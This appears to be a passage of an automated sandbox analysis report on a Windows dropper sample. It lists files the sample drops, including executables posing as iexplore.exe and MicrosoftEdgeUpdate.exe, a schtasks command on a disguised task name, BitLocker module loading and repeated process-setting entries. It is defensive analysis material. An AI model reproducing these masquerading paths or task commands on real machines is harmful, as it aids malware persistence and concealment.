Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\netifaces.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_common.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\python3.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\_lzma.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\libcrypto-1_1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_sfc64.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\VCRUNTIME140.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_umath.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\_ssl.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\select.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_pcg64.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_generator.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\libssl-1_1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_philox.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\_elementtree.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\ProgramData\Microsoft\Bound.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
